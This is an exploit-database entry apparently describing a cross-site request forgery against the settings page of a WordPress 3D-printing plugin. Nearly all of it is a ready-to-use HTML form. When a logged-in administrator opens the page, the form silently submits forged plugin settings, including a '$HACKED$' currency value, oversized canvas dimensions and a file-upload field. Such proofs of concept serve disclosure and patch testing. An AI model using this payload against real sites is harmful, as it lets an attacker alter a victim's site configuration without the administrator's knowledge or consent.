## https://sploitus.com/exploit?id=WPEX-ID:725AC766-C849-49D6-A968-58FCC2E134C8
Have a logged in admin open an HTML page containing the following form:
<form action="https://example.com/wp-admin/admin.php?page=p3dlite_settings" method="post" enctype="multipart/form-data">
<!-- Hidden inputs use the exact keys provided from the request body -->
<!-- Name attributes must match the request field names, with brackets and quotes properly encoded -->
<input type="hidden" name="p3dlite_settings[pricing]" value="request_estimate">
<input type="hidden" name="p3dlite_settings[min_price]" value="1">
<input type="hidden" name="p3dlite_settings[minimum_price_type]" value="minimum_price">
<input type="hidden" name="p3dlite_settings[currency]" value="$HACKED$">
<input type="hidden" name="p3dlite_settings[currency_position]" value="left">
<input type="hidden" name="p3dlite_settings[num_decimals]" value="2">
<input type="hidden" name="p3dlite_settings[thousand_sep]" value=",">
<input type="hidden" name="p3dlite_settings[decimal_sep]" value=".">
<input type="hidden" name="p3dlite_settings[price_debug_mode]" value="0">
<input type="hidden" name="action" value="update">
<input type="hidden" name="page_options" value="new_option_name,some_other_option,option_etc">
<input type="hidden" name="p3dlite_settings[canvas_width]" value="999999">
<input type="hidden" name="p3dlite_settings[canvas_height]" value="99999">
<!-- ... More hidden inputs for each setting ... -->
<!-- File input for the 'ajax_loader' field. Users must select a file manually. -->
<input type="file" name="p3dlite_settings[ajax_loader]">
<!-- Submit button. -->
<input type="submit" value="Submit">
</form>